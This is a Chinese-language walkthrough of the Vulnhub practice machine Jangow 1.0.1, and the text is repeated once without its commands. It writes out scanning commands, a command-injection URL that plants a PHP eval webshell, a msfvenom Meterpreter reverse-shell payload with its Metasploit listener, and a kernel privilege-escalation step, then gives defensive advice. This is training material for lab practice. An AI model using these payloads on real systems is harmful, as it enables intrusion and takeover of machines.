vulnhub系列2——Jangow: 1.0.1
字数 1192 2025-08-11 21:26:06

Jangow: 1.0.1 靶场实战教学文档

1. 靶场概述

Jangow: 1.0.1 是一个来自 Vulnhub 的渗透测试靶机,难度为初级到中级。本靶场主要考察以下技能:

  • 信息收集
  • Web应用漏洞利用
  • 命令注入漏洞
  • 反弹Shell技术
  • 权限提升技术

2. 环境准备

2.1 下载靶机

从 Vulnhub 下载 Jangow: 1.0.1 靶机镜像文件

2.2 网络配置

  • 攻击机IP: 192.168.56.105 (示例)
  • 靶机IP: 192.168.56.118 (通过扫描发现)

3. 渗透测试步骤

3.1 信息收集

3.1.1 主机发现

netdiscover -r 192.168.56.0/24

3.1.2 端口扫描

nmap -sV -Pn -sC 192.168.56.118

预期发现开放端口:

  • 80/tcp: HTTP服务

3.2 Web应用渗透

3.2.1 发现命令注入漏洞

在网页中发现存在命令执行功能的页面:

http://192.168.56.118/site/busque.php?buscar=

3.2.2 写入WebShell

使用命令注入写入一句话木马:

http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST[1]);' >a.php

这将创建一个名为a.php的WebShell文件,可使用蚁剑连接。

3.3 反弹Shell

3.3.1 生成PHP Meterpreter payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php

注意:根据实战经验,只有443端口能成功反弹Shell

3.3.2 上传并执行payload

通过蚁剑上传shell.php文件,然后通过浏览器访问执行

3.3.3 Metasploit监听

设置Metasploit监听:

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.105
set LPORT 443
exploit

3.4 交互式Shell获取

在Meterpreter会话中获取交互式Shell:

python3 -c "import pty;pty.spawn('/bin/bash');"

3.5 权限提升

3.5.1 使用CVE-2017-16695提权

该漏洞是Linux内核提权漏洞,利用步骤如下:

  1. 在目标机器上编译或上传利用代码
  2. 执行利用程序
  3. 获取root权限

3.5.2 替代提权方法

如果CVE-2017-16695不可用,可尝试以下方法:

  • 查找SUID/SGID文件
  • 检查内核版本寻找其他漏洞
  • 检查crontab任务
  • 检查可写配置文件

4. 关键点总结

  1. 信息收集要全面:通过netdiscover和nmap全面了解目标环境
  2. 命令注入利用:busque.php页面的命令注入是初始突破口
  3. 反弹Shell技巧:注意443端口的特殊性
  4. 交互式Shell:使用Python获取完整TTY
  5. 提权方法:CVE-2017-16695是有效提权路径

5. 防御建议

  1. 输入验证:对所有用户输入进行严格过滤
  2. 最小权限原则:Web应用运行账户应限制权限
  3. 及时更新:保持系统和内核版本最新
  4. 日志监控:监控异常命令执行行为
  5. WebShell检测:部署WebShell检测机制

6. 扩展学习

  1. 研究其他Linux内核提权漏洞
  2. 学习多种反弹Shell方法
  3. 探索不使用Metasploit的渗透方法
  4. 研究更隐蔽的持久化技术

通过本靶场练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别适合Web渗透和提权技术的学习。

Jangow: 1.0.1 靶场实战教学文档 1. 靶场概述 Jangow: 1.0.1 是一个来自 Vulnhub 的渗透测试靶机,难度为初级到中级。本靶场主要考察以下技能: 信息收集 Web应用漏洞利用 命令注入漏洞 反弹Shell技术 权限提升技术 2. 环境准备 2.1 下载靶机 从 Vulnhub 下载 Jangow: 1.0.1 靶机镜像文件 2.2 网络配置 攻击机IP: 192.168.56.105 (示例) 靶机IP: 192.168.56.118 (通过扫描发现) 3. 渗透测试步骤 3.1 信息收集 3.1.1 主机发现 3.1.2 端口扫描 预期发现开放端口: 80/tcp: HTTP服务 3.2 Web应用渗透 3.2.1 发现命令注入漏洞 在网页中发现存在命令执行功能的页面: 3.2.2 写入WebShell 使用命令注入写入一句话木马: 这将创建一个名为a.php的WebShell文件,可使用蚁剑连接。 3.3 反弹Shell 3.3.1 生成PHP Meterpreter payload 注意:根据实战经验,只有443端口能成功反弹Shell 3.3.2 上传并执行payload 通过蚁剑上传shell.php文件,然后通过浏览器访问执行 3.3.3 Metasploit监听 设置Metasploit监听: 3.4 交互式Shell获取 在Meterpreter会话中获取交互式Shell: 3.5 权限提升 3.5.1 使用CVE-2017-16695提权 该漏洞是Linux内核提权漏洞,利用步骤如下: 在目标机器上编译或上传利用代码 执行利用程序 获取root权限 3.5.2 替代提权方法 如果CVE-2017-16695不可用,可尝试以下方法: 查找SUID/SGID文件 检查内核版本寻找其他漏洞 检查crontab任务 检查可写配置文件 4. 关键点总结 信息收集要全面 :通过netdiscover和nmap全面了解目标环境 命令注入利用 :busque.php页面的命令注入是初始突破口 反弹Shell技巧 :注意443端口的特殊性 交互式Shell :使用Python获取完整TTY 提权方法 :CVE-2017-16695是有效提权路径 5. 防御建议 输入验证 :对所有用户输入进行严格过滤 最小权限原则 :Web应用运行账户应限制权限 及时更新 :保持系统和内核版本最新 日志监控 :监控异常命令执行行为 WebShell检测 :部署WebShell检测机制 6. 扩展学习 研究其他Linux内核提权漏洞 学习多种反弹Shell方法 探索不使用Metasploit的渗透方法 研究更隐蔽的持久化技术 通过本靶场练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别适合Web渗透和提权技术的学习。